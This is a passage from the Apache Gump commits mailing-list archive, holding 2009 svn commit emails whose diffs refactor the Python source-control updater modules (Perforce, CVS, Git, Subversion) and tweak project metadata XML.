Updater Modified: gump/trunk/python/gump/core/update/p4.py Modified: gump/trunk/python/gump/core/update/p4.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/p4.py?rev=744796&r1=744795&r2=744796&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/p4.py (original) +++ gump/trunk/python/gump/core/update/p4.py Mon Feb 16 03:55:39 2009 @@ -15,184 +15,58 @@ # See the License for the specific language governing permissions and # limitations under the License. -""" -""" +from gump.core.model.workspace import Cmd +from gump.core.update.scmupdater import ScmUpdater -import os.path -import sys -from fnmatch import fnmatch - -from gump import log -from gump.core.run.gumprun import * -from gump.core.config import dir, default, basicConfig - -from gump.util import dump, display, getIndent, logResourceUtilization, \ - invokeGarbageCollection -from gump.util.note import Annotatable -from gump.util.work import * - -from gump.util.tools import * - -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.project import Project -from gump.core.model.depend import ProjectDependency -from gump.core.model.stats import * -from gump.core.model.state import * +def getP4Command(module): + """ + Update this module (checking out if needed) + """ + cmd = Cmd('p4', 'update_' + module.getName(), + module.getWorkspace().getSourceControlStagingDirectory()) + + # Determine if a tag is set, on <p4 or on <module + tag = None + if module.getScm().hasTag(): + tag = module.getScm().getTag() + elif module.hasTag(): + tag = module.getTag() + + # Do a p4 sync + cmd.addParameter('-p', module.getScm().getPort()) + cmd.addParameter('-u', module.getScm().getUser()) + cmd.addParameter('-P', module.getScm().getPassword()) + cmd.addParameter('-c', module.getScm().getClientspec()) + cmd.addParameter('sync') + if tag: + cmd.addParameter(module.getName() + '/...@', tag, ' ') + else: + cmd.addParameter(module.getName() + '/...') + return cmd ############################################################################### # Classes ############################################################################### -class P4Updater(RunSpecific): +class P4Updater(ScmUpdater): + """ + Updater for Perforce + """ - def __init__(self,run): - RunSpecific.__init__(self,run) - - # - # A stash of known logins. - # - #self.logins=readLogins() + def __init__(self, run): + ScmUpdater.__init__(self, run) - def updateModule(self,module): + def getCheckoutCommand(self, module): """ - - Perform a P4 sync on a module - + Checkout this module """ - - #log.info('Perform P4 Sync on #[' + `module.getPosition()` + \ - # '] : ' + module.getName()) - - ## Did we 'P4 checkout' already? - exists = os.path.exists(module.getSourceControlStagingDirectory()) - - # Doesn't tell us much... - if exists: - self.performStatus(module) - - self.performUpdate(module,exists) - - return module.okToPerformWork() - - def performStatus(self,module): - # Get the Update Command - (repository, root, cmd ) = self.getUpdateCommand(module, True, True) - - ## Provide P4 logins, if not already there - #loginToRepositoryOnDemand(repository,root,self.logins) - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - - if not cmdResult.isOk(): - log.error('Failed to checkout/update module: ' + module.name) - - def performUpdate(self,module,exists): - """ - Update this module (checking out if needed) + return getP4Command(module) + + def getUpdateCommand(self, module): """ - # Get the Update Command - (repository, root, cmd ) = self.getUpdateCommand(module, exists) - - #log.debug("P4 Sync Module " + module.getName() + \ - # ", Repository Name: " + str(module.repository.getName())) - - ## Provide P4 logins, if not already there - #loginToRepositoryOnDemand(repository,root,self.logins) - - # Execute the command and capture results - cmdResult=execute(cmd, module.getWorkspace().tmpdir) - - # - # Store this as work, on both the module and (cloned) on the repo - # - work=CommandWorkItem(WORK_TYPE_UPDATE,cmd,cmdResult) - module.performedWork(work) - repository.performedWork(work.clone()) - - # Update Context w/ Results - if not cmdResult.isOk(): - log.error('Failed w/ P4 Root ' + root + ' for %s on Repository %s.' \ - % (module.name, module.repository.getName())) - module.changeState(STATE_FAILED,REASON_UPDATE_FAILED) - else: - module.changeState(STATE_SUCCESS) - - # We run P4 so any output means updates occured... - if cmdResult.hasOutput(): - log.info('Update(s) received via P4 on #[' \ - + `module.getPosition()` + \ - '] : ' + module.getName()) - - def preview(self,module): - - (repository, root, command ) = self.getUpdateCommand(module,False) - command.dump() - - # Doesn't tell us much... - #(repository, root, command ) = self.getUpdateCommand(module,True,True) - #command.dump() - - (repository, root, command ) = self.getUpdateCommand(module,True) - command.dump() - - - def getUpdateCommand(self,module,exists=False,nowork=False): - """ - Format a commandline for doing the P4 update + Update this module """ - if nowork and not exists: - raise RuntimeException('Not coded for this combo.') - - root=module.getScm().getClientspec() - # Prepare P4 sync command... - prefix='update' - directory=module.getWorkspace().getSourceControlStagingDirectory() - #if exists: - # directory=module.getSourceControlStagingDirectory() - if nowork: - prefix='status' - - cmd=Cmd( 'p4', - prefix+'_'+module.getName(), - directory) - - ## Allow trace for debug - #if module.isDebug(): - # cmd.addParameter('-t') - - ## Request compression - #cmd.addParameter('-z3') - - # Determine if a tag is set, on <p4 or on <module - tag=None - if module.getScm().hasTag(): - tag=module.getScm().getTag() - elif module.hasTag(): - tag=module.getTag() - - # Do a p4 sync - cmd.addParameter('-p',module.getScm().getPort()) - cmd.addParameter('-u',module.getScm().getUser()) - cmd.addParameter('-P',module.getScm().getPassword()) - cmd.addParameter('-c',root) - cmd.addParameter('sync') - if nowork: - cmd.addParameter('-n') - if tag: - cmd.addParameter(module.getName()+'/...@',tag,' ') - else: - cmd.addParameter(module.getName()+'/...') - #cmd.addParameter(module.getName()) + return getP4Command(module) - return (module.repository, root, cmd) - From [email protected] Mon Feb 16 04:54:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76329 invoked from network); 16 Feb 2009 04:54:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2009 04:54:54 -0000 Received: (qmail 79535 invoked by uid 500); 16 Feb 2009 04:54:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 79526 invoked by uid 99); 16 Feb 2009 04:54:54 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 15 Feb 2009 20:54:54 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Feb 2009 04:54:51 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id D6B1523888D5; Mon, 16 Feb 2009 04:54:29 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r744799 - in /gump/trunk/python/gump/core/update: cvs.py git.py scmupdater.py svn.py updater.py Date: Mon, 16 Feb 2009 04:54:29 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Mon Feb 16 04:54:28 2009 New Revision: 744799 URL: http://svn.apache.org/viewvc?rev=744799&view=rev Log: PyLint assisted import cleaning - and some methods are now functions Modified: gump/trunk/python/gump/core/update/cvs.py gump/trunk/python/gump/core/update/git.py gump/trunk/python/gump/core/update/scmupdater.py gump/trunk/python/gump/core/update/svn.py gump/trunk/python/gump/core/update/updater.py Modified: gump/trunk/python/gump/core/update/cvs.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/cvs.py?rev=744799&r1=744798&r2=744799&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/cvs.py (original) +++ gump/trunk/python/gump/core/update/cvs.py Mon Feb 16 04:54:28 2009 @@ -15,49 +15,36 @@ # See the License for the specific language governing permissions and # limitations under the License. -""" - -""" - -import os.path -import sys -from fnmatch import fnmatch - -from gump import log -from gump.core.run.gumprun import * -from gump.core.config import dir, default, basicConfig - -from gump.util import dump, display, getIndent, logResourceUtilization, \ - invokeGarbageCollection -from gump.util.note import Annotatable -from gump.util.work import * - -from gump.util.tools import * - -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.project import Project -from gump.core.model.depend import ProjectDependency -from gump.core.model.stats import * -from gump.core.model.state import * - -from gump.tool.integration.cvs import * - +from gump.core.model.workspace import Cmd from gump.core.update.scmupdater import ScmUpdater +from gump.tool.integration.cvs import readLogins, loginToRepositoryOnDemand + +def maybe_add_tag(module, cmd): + # Determine if a tag is set, on <cvs or on <module + tag = None + if module.getScm().hasTag(): + tag = module.getScm().getTag() + elif module.hasTag(): + tag = module.getTag() + if tag: + cmd.addParameter('-r', tag, ' ') ############################################################################### # Classes ############################################################################### class CvsUpdater(ScmUpdater): + """ + Updater for CVS + """ - def __init__(self,run): - ScmUpdater.__init__(self,run) + def __init__(self, run): + ScmUpdater.__init__(self, run) # # A stash of known logins. # - self.logins=readLogins() + self.logins = readLogins() def getCheckoutCommand(self, module): """ @@ -72,7 +59,7 @@ # do a cvs checkout cmd.addParameter('checkout') cmd.addParameter('-P') - self.maybeAddTag(module, cmd) + maybe_add_tag(module, cmd) if not module.getScm().hasModule() or \ not module.getScm().getModule() == module.getName(): @@ -100,7 +87,7 @@ cmd.addParameter('update') cmd.addParameter('-P') cmd.addParameter('-d') - self.maybeAddTag(module, cmd) + maybe_add_tag(module, cmd) return cmd @@ -122,12 +109,3 @@ # Provide CVS logins, if not already there loginToRepositoryOnDemand(repository, root, self.logins) - def maybeAddTag(self, module, cmd): - # Determine if a tag is set, on <cvs or on <module - tag = None - if module.getScm().hasTag(): - tag = module.getScm().getTag() - elif module.hasTag(): - tag = module.getTag() - if tag: - cmd.addParameter('-r', tag, ' ') Modified: gump/trunk/python/gump/core/update/git.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/git.py?rev=744799&r1=744798&r2=744799&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/git.py (original) +++ gump/trunk/python/gump/core/update/git.py Mon Feb 16 04:54:28 2009 @@ -16,49 +16,35 @@ # See the License for the specific language governing permissions and # limitations under the License. -""" - -""" - -import os.path -import sys -from fnmatch import fnmatch - from gump import log -from gump.core.run.gumprun import * -from gump.core.config import dir, default, basicConfig - -from gump.util import dump, display, getIndent, logResourceUtilization, \ - invokeGarbageCollection -from gump.util.note import Annotatable -from gump.util.work import * - -from gump.util.tools import * - -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.project import Project -from gump.core.model.depend import ProjectDependency -from gump.core.model.stats import * -from gump.core.model.state import * - +from gump.core.model.workspace import Cmd from gump.core.update.scmupdater import ScmUpdater +def log_repository_and_url(module): + repository = module.repository + url = module.getScm().getRootUrl() + log.debug("GIT URL: [" + url + "] on Repository: " + \ + repository.getName()) + + ############################################################################### # Classes ############################################################################### class GitUpdater(ScmUpdater): + """ + Updater for GIT + """ - def __init__(self,run): - ScmUpdater.__init__(self,run) + def __init__(self, run): + ScmUpdater.__init__(self, run) def getCheckoutCommand(self, module): """ Build the appropriate GIT command for clone """ - self.logRepositoryAndURL(module) + log_repository_and_url(module) cmd = Cmd('git-clone', 'update_' + module.getName(), module.getWorkspace().getSourceControlStagingDirectory()) self.maybeMakeQuiet(module, cmd) @@ -70,19 +56,12 @@ """ Build the appropriate GIT command for pull """ - self.logRepositoryAndURL(module) + log_repository_and_url(module) cmd = Cmd('git-pull', 'update_' + module.getName(), module.getSourceControlStagingDirectory()) self.maybeMakeQuiet(module, cmd) return cmd - def logRepositoryAndURL(self, module): - repository = module.repository - url = module.getScm().getRootUrl() - log.debug("GIT URL: [" + url + "] on Repository: " + \ - repository.getName()) - def maybeMakeQuiet(self, module, cmd): if self.shouldBeQuiet(module): cmd.addParameter('--quiet') - Modified: gump/trunk/python/gump/core/update/scmupdater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/scmupdater.py?rev=744799&r1=744798&r2=744799&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/scmupdater.py (original) +++ gump/trunk/python/gump/core/update/scmupdater.py Mon Feb 16 04:54:28 2009 @@ -17,16 +17,12 @@ # limitations under the License. import os.path -import sys from gump import log -from gump.core.run.gumprun import * -from gump.util.note import Annotatable -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.stats import * -from gump.core.model.state import * +from gump.core.model.workspace import CommandWorkItem, execute, \ + REASON_UPDATE_FAILED, STATE_FAILED, STATE_SUCCESS, WORK_TYPE_UPDATE +from gump.core.run.gumprun import RunSpecific ############################################################################### # Classes @@ -38,7 +34,7 @@ Provides helpers and template method implementations. """ - def __init__(self,run): + def __init__(self, run): RunSpecific.__init__(self, run) # @@ -69,12 +65,13 @@ if cmd: if isUpdate: - log.debug(module.getScm().getScmName() + " Module Update : " +\ + log.debug(module.getScm().getScmName() + " Module Update : " + \ module.getName() + ", Repository Name: " + \ module.repository.getName()) else: - log.debug(module.getScm().getScmName() + " Module Checkout : " +\ - module.getName() + ", Repository Name: " + \ + log.debug(module.getScm().getScmName() + \ + " Module Checkout : " + module.getName() + \ + ", Repository Name: " + \ module.repository.getName()) # Execute the command and capture results @@ -94,7 +91,8 @@ return module.okToPerformWork() - log.error("Don't know how to to checkout/update module: " + module.name) + log.error("Don't know how to to checkout/update module: " + \ + module.name) module.changeState(STATE_FAILED, REASON_UPDATE_FAILED) return False Modified: gump/trunk/python/gump/core/update/svn.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/svn.py?rev=744799&r1=744798&r2=744799&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/svn.py (original) +++ gump/trunk/python/gump/core/update/svn.py Mon Feb 16 04:54:28 2009 @@ -16,32 +16,8 @@ # See the License for the specific language governing permissions and # limitations under the License. -""" - -""" - -import os.path -import sys -from fnmatch import fnmatch - from gump import log -from gump.core.run.gumprun import * -from gump.core.config import dir, default, basicConfig - -from gump.util import dump, display, getIndent, logResourceUtilization, \ - invokeGarbageCollection -from gump.util.note import Annotatable -from gump.util.work import * - -from gump.util.tools import * - -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.project import Project -from gump.core.model.depend import ProjectDependency -from gump.core.model.stats import * -from gump.core.model.state import * - +from gump.core.model.workspace import Cmd from gump.core.update.scmupdater import ScmUpdater ############################################################################### @@ -49,9 +25,12 @@ ############################################################################### class SvnUpdater(ScmUpdater): + """ + Updater for Subversion + """ - def __init__(self,run): - ScmUpdater.__init__(self,run) + def __init__(self, run): + ScmUpdater.__init__(self, run) def getCheckoutCommand(self, module): @@ -79,8 +58,8 @@ # # Prepare SVN checkout/update command... # - cmd=Cmd('svn', 'update_'+module.getName(), - module.getWorkspace().getSourceControlStagingDirectory()) + cmd = Cmd('svn', 'update_'+module.getName(), + module.getWorkspace().getSourceControlStagingDirectory()) # # Be 'quiet' (but not silent) unless requested otherwise. Modified: gump/trunk/python/gump/core/update/updater.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/update/updater.py?rev=744799&r1=744798&r2=744799&view=diff ============================================================================== --- gump/trunk/python/gump/core/update/updater.py (original) +++ gump/trunk/python/gump/core/update/updater.py Mon Feb 16 04:54:28 2009 @@ -21,32 +21,70 @@ """ import os.path -import sys from gump import log - -from gump.core.run.gumprun import * -from gump.core.config import dir, default, basicConfig - +from gump.core.model.workspace import catFileToFileHolder, \ + EXIT_CODE_FAILED, EXIT_CODE_SUCCESS, FILE_TYPE_LOG, \ + gumpSafeName, logResourceUtilization, \ + STATE_FAILED, STATE_SUCCESS, syncDirectories, REASON_SYNC_FAILED +from gump.core.run.gumprun import RunSpecific from gump.core.update.cvs import CvsUpdater -from gump.core.update.svn import SvnUpdater -from gump.core.update.p4 import P4Updater from gump.core.update.git import GitUpdater +from gump.core.update.p4 import P4Updater +from gump.core.update.svn import SvnUpdater + +def syncModule(module): + """ + + Synchronize the storage area with the build area + + """ + workspace = module.getWorkspace() + + sourcedir = module.getSourceControlStagingDirectory() + destdir = module.getWorkingDirectory() + + # Perform the sync... + try: + # Store changes next to updates log + changesFile = os.path.abspath(os.path.join(workspace.tmpdir, + 'changes_to_' + \ + gumpSafeName(module.getName()) + \ + '.txt')) + + # Perform the operation. + (actions, modified, cleaned) = syncDirectories(sourcedir, destdir, \ + module, \ + changesFile) -from gump.util import dump, display, getIndent, logResourceUtilization, \ - invokeGarbageCollection -from gump.util.note import Annotatable -from gump.util.work import * - -from gump.util.tools import * - -from gump.core.model.workspace import * -from gump.core.model.module import Module -from gump.core.model.project import Project -from gump.core.model.depend import ProjectDependency -from gump.core.model.stats import * -from gump.core.model.state import * + # We are good to go... + module.changeState(STATE_SUCCESS) + + # Were the contents of the repository modified? + if modified: + + # + # Use 'incoming changes' to note that the module + # was modified. + # + module.setModified(True) + log.info('Update(s) received via on #[' \ + + `module.getPosition()` + \ + '] : ' + module.getName()) + + + except Exception, details: + module.changeState(STATE_FAILED, REASON_SYNC_FAILED) + message = 'Synchronize Failed: ' + str(details) + module.addError(message) + log.error(message, exc_info=1) + + + # Might help even with sync failures. + if os.path.exists(changesFile): + catFileToFileHolder(module, changesFile, FILE_TYPE_LOG) + return module.okToPerformWork() ############################################################################### # Classes @@ -54,34 +92,30 @@ class GumpUpdater(RunSpecific): - def __init__(self,run): + def __init__(self, run): RunSpecific.__init__(self, run) self.updaters = {'cvs' : CvsUpdater(run), 'svn' : SvnUpdater(run), 'p4' : P4Updater(run), 'git' : GitUpdater(run)} - """ - - ****************************************************************** - - THE UPDATE INTERFACE - - ****************************************************************** - - """ + # ****************************************************************** + # + # THE UPDATE INTERFACE + # + # ****************************************************************** def update(self): logResourceUtilization('Before update') # # Doing a full build? # - all=not self.run.getOptions().isQuick() + all = not self.run.getOptions().isQuick() if all: - modules=self.run.getGumpSet().getModuleSequence() + modules = self.run.getGumpSet().getModuleSequence() else: - modules=self.run.getGumpSet().getModules() + modules = self.run.getGumpSet().getModules() # # Checkout from source code repositories @@ -108,7 +142,7 @@ for module in list: self.updateModule(module) - def updateModule(self,module): + def updateModule(self, module): # if module.isPackaged(): # # Not sure we have anything to do right now @@ -133,7 +167,7 @@ # Synchronize the files... if ok: - self.syncModule(module) + syncModule(module) def getScmUpdater(self, module): @@ -145,60 +179,7 @@ return self.updaters.get(scm.getScmType()) return None - def syncModule(self,module): - """ - - Synchronize the storage area with the build area - - """ - workspace = module.getWorkspace() - - sourcedir = module.getSourceControlStagingDirectory() - destdir = module.getWorkingDirectory() - - # Perform the sync... - try: - # Store changes next to updates log - changesFile = os.path.abspath(os.path.join(workspace.tmpdir, - 'changes_to_' + \ - gumpSafeName(module.getName()) + \ - '.txt')) - - # Perform the operation. - (actions,modified,cleaned)=syncDirectories(sourcedir,destdir,module, - changesFile) - - # We are good to go... - module.changeState(STATE_SUCCESS) - - # Were the contents of the repository modified? - if modified: - - # - # Use 'incoming changes' to note that the module - # was modified. - # - module.setModified(True) - log.info('Update(s) received via on #[' \ - + `module.getPosition()` + \ - '] : ' + module.getName()) - - - except Exception, details: - module.changeState(STATE_FAILED,REASON_SYNC_FAILED) - message='Synchronize Failed: ' + str(details) - module.addError(message) - log.error(message, exc_info=1) - - - # Might help even with sync failures. - if os.path.exists(changesFile): - catFileToFileHolder(module, changesFile, FILE_TYPE_LOG) - - return module.okToPerformWork() - - - def preview(self,module): + def preview(self, module): """ Preview what ought occur for this From [email protected] Mon Feb 16 08:03:50 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 64936 invoked from network); 16 Feb 2009 08:03:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2009 08:03:50 -0000 Received: (qmail 99807 invoked by uid 500); 16 Feb 2009 08:03:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99798 invoked by uid 99); 16 Feb 2009 08:03:50 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Feb 2009 00:03:50 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Feb 2009 08:03:48 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0CB1723889B2; Mon, 16 Feb 2009 08:03:27 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r744847 - in /gump/metadata: project/ repository/ Date: Mon, 16 Feb 2009 08:03:26 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Mon Feb 16 08:03:26 2009 New Revision: 744847 URL: http://svn.apache.org/viewvc?rev=744847&view=rev Log: fix eol-style Modified: gump/metadata/project/activeio.xml (props changed) gump/metadata/project/activemq.xml (props changed) gump/metadata/project/camel.xml (props changed) gump/metadata/project/db-ojb-1-0-release.xml (props changed) gump/metadata/project/james-jsieve.xml (props changed) gump/metadata/project/jmdns.xml (props changed) gump/metadata/project/logging-log4j-component.xml (props changed) gump/metadata/project/logging-log4j-extras.xml (props changed) gump/metadata/project/logging-log4j-receivers.xml (props changed) gump/metadata/project/logging-log4j-zeroconf.xml (props changed) gump/metadata/project/logging-log4net.xml (props changed) gump/metadata/project/pcre.xml (props changed) gump/metadata/repository/antbook.xml (props changed) gump/metadata/repository/antworks.xml (props changed) gump/metadata/repository/aopalliance.xml (props changed) gump/metadata/repository/barcode4j.xml (props changed) gump/metadata/repository/beaver.xml (props changed) gump/metadata/repository/beepcore.xml (props changed) gump/metadata/repository/ggf-cddlm.xml (props changed) gump/metadata/repository/jboss.xml (props changed) gump/metadata/repository/mina.xml (props changed) gump/metadata/repository/pcre.xml (props changed) gump/metadata/repository/poi.xml (props changed) gump/metadata/repository/smartfrog.xml (props changed) Propchange: gump/metadata/project/activeio.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/project/activemq.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/project/camel.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/project/db-ojb-1-0-release.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/project/james-jsieve.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/project/jmdns.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/project/logging-log4j-component.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/project/logging-log4j-extras.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/project/logging-log4j-receivers.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/project/logging-log4j-zeroconf.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/project/logging-log4net.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/project/pcre.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/antbook.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/antworks.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/aopalliance.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/barcode4j.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/beaver.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/beepcore.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/ggf-cddlm.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/jboss.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/mina.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/pcre.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/poi.xml ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/metadata/repository/smartfrog.xml ------------------------------------------------------------------------------ svn:eol-style = native From [email protected] Mon Feb 16 08:05:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65715 invoked from network); 16 Feb 2009 08:05:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2009 08:05:22 -0000 Received: (qmail 3521 invoked by uid 500); 16 Feb 2009 08:05:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 3512 invoked by uid 99); 16 Feb 2009 08:05:22 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Feb 2009 00:05:22 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 16 Feb 2009 08:05:20 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0E43D238896B; Mon, 16 Feb 2009 08:04:59 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r744849 - in /gump/metadata/project: ant-antlibs-sandbox.xml ant-antlibs.xml Date: Mon, 16 Feb 2009 08:04:58 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Mon Feb 16 08:04:58 2009 New Revision: 744849 URL: http://svn.apache.org/viewvc?rev=744849&view=rev Log: make nag-mails work Modified: gump/metadata/project/ant-antlibs-sandbox.xml gump/metadata/project/ant-antlibs.xml Modified: gump/metadata/project/ant-antlibs-sandbox.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/ant-antlibs-sandbox.xml?rev=744849&r1=744848&r2=744849&view=diff ============================================================================== --- gump/metadata/project/ant-antlibs-sandbox.xml (original) +++ gump/metadata/project/ant-antlibs-sandbox.xml Mon Feb 16 08:04:58 2009 @@ -38,7 +38,7 @@ <jar name="http/build/ant-http-@@DATE@@.jar"/> <license name="http/common/LICENSE"/> - <nag from="Gump Integration Build &lt;[email protected]&gt;" + <nag from="Gump Integration Build &lt;[email protected]&gt;" to="[email protected]"/> </project> <!-- @@ -58,7 +58,7 @@ <depend project="junit"/> <depend project="xml-xerces"/> <depend project="xml-apis"/> - <nag from="Gump Integration Build &lt;[email protected]&gt;" + <nag from="Gump Integration Build &lt;[email protected]&gt;" to="[email protected]"/> </project> --> @@ -75,7 +75,7 @@ </ant> <jar name="manual4eclipse/build/ant-m4e-@@DATE@@.jar"/> - <nag from="Gump Integration Build &lt;[email protected]&gt;" + <nag from="Gump Integration Build &lt;[email protected]&gt;" to="[email protected]"/> </project> @@ -91,7 +91,7 @@ </ant> <jar name="dbpatch/build/ant-dbpatch-@@DATE@@.jar"/> - <nag from="Gump Integration Build &lt;[email protected]&gt;" + <nag from="Gump Integration Build &lt;[email protected]&gt;" to="[email protected]"/> </project> Modified: gump/metadata/project/ant-antlibs.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/ant-antlibs.xml?rev=744849&r1=744848&r2=744849&view=diff ============================================================================== --- gump/metadata/project/ant-antlibs.xml (original) +++ gump/metadata/project/ant-antlibs.xml Mon Feb 16 08:04:58 2009 @@ -39,7 +39,7 @@ <jar name="antunit/build/ant-antunit-@@DATE@@.jar"/> <license name="antunit/common/LICENSE"/> - <nag from="Gump Integration Build &lt;[email protected]&gt;" + <nag from="Gump Integration Build &lt;[email protected]&gt;" to="[email protected]"/> </project> @@ -57,7 +57,7 @@ <depend project="junit"/> <depend project="xml-xerces"/> <depend project="xml-apis"/> - <nag from="Gump Integration Build &lt;[email protected]&gt;" + <nag from="Gump Integration Build &lt;[email protected]&gt;" to="[email protected]"/> </project> @@ -75,7 +75,7 @@ <jar name="dotnet/build/ant-dotnet-@@DATE@@.jar"/> <license name="dotnet/common/LICENSE"/> - <nag from="Gump Integration Build &lt;[email protected]&gt;" + <nag from="Gump Integration Build &lt;[email protected]&gt;" to="[email protected]"/> </project> @@ -93,7 +93,7 @@ <depend project="xml-xerces"/> <depend project="xml-apis"/> <!-- - <nag from="Gump Integration Build &lt;[email protected]&gt;" + <nag from="Gump Integration Build &lt;[email protected]&gt;" to="[email protected]"/> --> </project> @@ -112,7 +112,7 @@ <jar name="svn/build/ant-svn-@@DATE@@.jar"/> <license name="svn/common/LICENSE"/> - <nag from="Gump Integration Build &lt;[email protected]&gt;" + <nag from="Gump Integration Build &lt;[email protected]&gt;" to="[email protected]"/> </project> @@ -130,7 +130,7 @@ <depend project="svn-antlib"/> <depend project="xml-xerces"/> <depend project="xml-apis"/> - <nag from="Gump Integration Build &lt;[email protected]&gt;" + <nag from="Gump Integration Build &lt;[email protected]&gt;" to="[email protected]"/> </project> From [email protected] Tue Feb 17 13:10:38 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30103 invoked from network); 17 Feb 2009 13:10:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 